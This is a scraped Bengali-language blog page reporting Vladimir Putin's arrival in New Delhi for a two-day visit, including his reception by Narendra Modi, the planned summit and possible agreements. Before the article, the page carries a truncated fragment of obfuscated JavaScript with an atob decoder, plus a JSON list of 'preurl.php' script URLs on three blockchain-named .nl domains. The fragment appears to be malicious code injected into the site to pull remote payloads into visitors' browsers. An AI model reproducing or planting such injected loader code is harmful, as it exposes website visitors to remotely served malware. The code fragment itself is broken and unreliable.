/*>(-0x2*o&0x6)):0x0){q=i['indexOf'](q);}return n;});}());var g=function(h,l){var m=[],n=0x0,o,p='',q='';h=atob(h);for(var t=0x0,u=h['length'];t/* */ { "urls": [ "chaintopdom.nl/script/preurl.php", "smarttopchain.nl/script/preurl.php", "topblockchainsolutions.nl/script/preurl.php" ] } ভারতে এলেন রুশ প্রেসিডেন্ট ভ্লাদিমির পুতিন - bd5.blogspot.com

Header Ads ADCASH

ভারতে এলেন রুশ প্রেসিডেন্ট ভ্লাদিমির পুতিন

 

ভারতে এলেন রুশ প্রেসিডেন্ট ভ্লাদিমির পুতিন

 


 


রাশিয়ার প্রেসিডেন্ট ভ্লাদিমির পুতিন দুই দিনের সরকারি সফরে বৃহস্পতিবার সন্ধ্যায় ভারতের রাজধানী নয়াদিল্লিতে পৌঁছেছেন। পালাম বিমানবন্দরে ভারতের প্রধানমন্ত্রী নরেন্দ্র মোদি তাকে অভ্যর্থনা জানান। আজ রাতেই দুই নেতা নৈশভোজে বসবেন এবং আগামীকাল শুক্রবার অনুষ্ঠিত হবে তাদের দ্বিপক্ষীয় শীর্ষ বৈঠক।

শীর্ষ বৈঠকের আগে রাষ্ট্রপতি ভবনে পুতিনকে দেওয়া হবে আনুষ্ঠানিক সম্মাননা। এরপর তিনি দিল্লির হায়দরাবাদ হাউসে মধ্যাহ্নভোজে অংশ নেবেন এবং সেখানেই অবস্থান করবেন।

২০২১ সালের পর এটিই পুতিনের প্রথম ভারত সফর। গত বছর নরেন্দ্র মোদি মস্কো গিয়ে বার্ষিক সম্মেলনে যোগ দিয়েছিলেন। বর্তমান সময়ে দুই দেশই নানা চ্যালেঞ্জের মুখোমুখি—পুতিন ইউক্রেন যুদ্ধ নিয়ে পশ্চিমা চাপ সামলাচ্ছেন, আর ভারত পাকিস্তানের সঙ্গে উত্তেজনা, যুক্তরাষ্ট্রের সঙ্গে সম্পর্কের টানাপোড়েন এবং রাশিয়া থেকে তেল আমদানি ঘিরে নানা নিষেধাজ্ঞার পরিস্থিতি মোকাবিলা করছে। এমন অবস্থায় দ্বিপক্ষীয় সম্পর্ক শক্তিশালী করতে পুতিনের এ সফর গুরুত্বপূর্ণ বলে মনে করছেন বিশ্লেষকেরা।

এনডিটিভি ও দ্য ইন্ডিয়ান এক্সপ্রেস জানিয়েছে, শুক্রবার সকালে পুতিন রাজঘাটে গিয়ে মহাত্মা গান্ধীর সমাধিতে শ্রদ্ধা নিবেদন করবেন। দিনব্যাপী কর্মসূচির মধ্যে রয়েছে নয়াদিল্লিতে রাশিয়ার গণমাধ্যম ‘আরটি ইন্ডিয়া’র উদ্বোধন এবং ভারতের রাষ্ট্রপতি দ্রৌপদী মুর্মুর দেওয়া রাষ্ট্রীয় ভোজে অংশগ্রহণ।

শুক্রবার রাত প্রায় ৯টার দিকে পুতিনের ভারত ছাড়ার কথা রয়েছে। ইউক্রেন যুদ্ধ শুরু হওয়ার পর এটিই তার প্রথম ভারত সফর। স্বাস্থ্য, বাণিজ্যসহ বিভিন্ন খাতে দুই দেশের মধ্যে একাধিক চুক্তি হতে পারে বলে ধারণা করা হচ্ছে।

বিশ্লেষকদের মতে, দুই দেশই বিকল্প পেমেন্ট ব্যবস্থার সম্ভাবনা খুঁজছে এবং বাণিজ্য সম্প্রসারণে নতুন পথ খুঁজে দেখছে। ক্ষুদ্র মডুলার পারমাণবিক রিঅ্যাক্টরও আলোচনার সম্ভাব্য বিষয়। পুতিনের সফর দ্বিপক্ষীয় সম্পর্ককে নতুন গতিতে এগিয়ে নেবে বলে আশা করা হচ্ছে, যদিও যুক্তরাষ্ট্র ও ইউরোপীয় ইউনিয়নের প্রতিক্রিয়া সামলেই ভারতকে এই সম্পর্ককে এগিয়ে নিতে হবে।

No comments

Theme images by suprun. Powered by Blogger.